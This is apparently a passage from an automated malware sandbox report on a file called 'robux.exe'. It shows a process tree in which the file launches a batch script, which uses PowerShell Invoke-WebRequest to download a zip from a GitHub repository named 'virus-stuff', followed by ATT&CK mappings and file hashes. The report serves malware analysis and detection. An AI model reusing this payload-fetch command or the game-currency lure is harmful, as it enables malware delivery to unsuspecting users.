  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7276 /prefetch:1
  2⤵
  PID:5392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8188 /prefetch:1
  2⤵
  PID:5416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7384 /prefetch:1
  2⤵
  PID:5492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8476 /prefetch:1
  2⤵
  PID:5572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8516 /prefetch:1
  2⤵
  PID:5580
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8904 /prefetch:1
  2⤵
  PID:5724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7392 /prefetch:1
  2⤵
  PID:5964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8592 /prefetch:1
  2⤵
  PID:5972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
  2⤵
  PID:5980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7464 /prefetch:1
  2⤵
  PID:556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1
  2⤵
  PID:4372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:1
  2⤵
  PID:5520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6804 /prefetch:1
  2⤵
  PID:5396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6548 /prefetch:1
  2⤵
  PID:1820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8004 /prefetch:1
  2⤵
  PID:5256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7992 /prefetch:1
  2⤵
  PID:6032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7588 /prefetch:1
  2⤵
  PID:1776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7448 /prefetch:1
  2⤵
  PID:5864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8020 /prefetch:1
  2⤵
  PID:4404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7848 /prefetch:1
  2⤵
  PID:5912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:1
  2⤵
  PID:5252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
  2⤵
  PID:5268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6916 /prefetch:1
  2⤵
  PID:5388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6132 /prefetch:1
  2⤵
  PID:5132
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8680 /prefetch:1
  2⤵
  PID:5868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:1
  2⤵
  PID:5884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6612 /prefetch:1
  2⤵
  PID:5664
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7056 /prefetch:1
  2⤵
  PID:5608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8124 /prefetch:1
  2⤵
  PID:5244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8884 /prefetch:1
  2⤵
  PID:5612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8984 /prefetch:1
  2⤵
  PID:5788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8848 /prefetch:1
  2⤵
  PID:4972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9008 /prefetch:1
  2⤵
  PID:4576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7260 /prefetch:1
  2⤵
  PID:4004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=8256 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8216 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9364 /prefetch:1
  2⤵
  PID:3672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9516 /prefetch:1
  2⤵
  PID:920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5868 /prefetch:8
  2⤵
  PID:6032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5412 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:5460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
  2⤵
  PID:6120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:1
  2⤵
  PID:5416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8216 /prefetch:1
  2⤵
  PID:4308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7304 /prefetch:1
  2⤵
  PID:3388
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9592 /prefetch:1
  2⤵
  PID:4588
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8148 /prefetch:1
  2⤵
  PID:5356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
  2⤵
  PID:812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=9256 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10088 /prefetch:1
  2⤵
  PID:1036
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6484 /prefetch:1
  2⤵
  PID:3148
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1808 /prefetch:1
  2⤵
  PID:5352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10416 /prefetch:1
  2⤵
  PID:1568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7976 /prefetch:8
  2⤵
  PID:968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6600 /prefetch:1
  2⤵
  PID:3004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10304 /prefetch:8
  2⤵
  PID:5764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2040,6410093911034433243,7606455172542545534,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10620 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5832
- C:\Users\Admin\Downloads\robux.exe
  "C:\Users\Admin\Downloads\robux.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1664
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B648.tmp\B649.tmp\B64A.bat C:\Users\Admin\Downloads\robux.exe"
    3⤵
    PID:752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4312
  - - C:\Windows\system32\timeout.exe
      timeout /t 3 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2948
  - - C:\Windows\system32\timeout.exe
      timeout /t 10 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4684

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4740

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
99afa4934d1e3c56bbce114b356e8a99

SHA1
3f0e7a1a28d9d9c06b6663df5d83a65c84d52581

SHA256
08e098bb97fd91d815469cdfd5568607a3feca61f18b6b5b9c11b531fde206c8

SHA512
76686f30ed68144cf943b80ac10b52c74eee84f197cee3c24ef7845ef44bdb5586b6e530824543deeed59417205ac0e2559808bcb46450504106ac8f4c95b9da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
443a627d539ca4eab732bad0cbe7332b

SHA1
86b18b906a1acd2a22f4b2c78ac3564c394a9569

SHA256
1e1ad9dce141f5f17ea07c7e9c2a65e707c9943f172b9134b0daf9eef25f0dc9

SHA512
923b86d75a565c91250110162ce13dd3ef3f6bdde1a83f7af235ed302d4a96b8c9ed722e2152781e699dfcb26bb98afc73f5adb298f8fd673f14c9f28b5f764d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\4ed32b35-7f62-48bc-85b4-42ac09cd060f.tmp

Filesize
2KB

MD5
b76e9e2c2374ee3145f45a29419999ad

SHA1
13e6c293f2ab8c8713492cd67ed659b9ed0a119f

SHA256
0b04eb6fe46169773bb28501337a6a4bccd667e817bdf3d00b35ccd993082b3d

SHA512
8367d30366c13a8c9183ead597818e151ca03fe9ee56b9a6f47d2bbe938ec08fffc040d1ec936593587669df7f8723ba4083e8d7ebddcdbad8769d896e92efc7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
47KB

MD5
2bbb6e1cbade9a534747c3b0ddf11e21

SHA1
a0a1190787109ae5b6f97907584ee64183ac7dd5

SHA256
5694ef0044eb39fe4f79055ec5cab35c6a36a45b0f044d7e60f892e9e36430c9

SHA512
3cb1c25a43156199d632f87569d30a4b6db9827906a2312e07aa6f79bb8475a115481aa0ff6d8e68199d035c437163c7e876d76db8c317d8bdf07f6a770668f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
62KB

MD5
c813a1b87f1651d642cdcad5fca7a7d8

SHA1
0e6628997674a7dfbeb321b59a6e829d0c2f4478

SHA256
df670e09f278fea1d0684afdcd0392a83d7041585ba5996f7b527974d7d98ec3

SHA512
af0d024ba1faafbd6f950c67977ed126827180a47cea9758ee51a95d13436f753eb5a7aa12a9090048a70328f6e779634c612aebde89b06740ffd770751e1c5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
67KB

MD5
69df804d05f8b29a88278b7d582dd279

SHA1
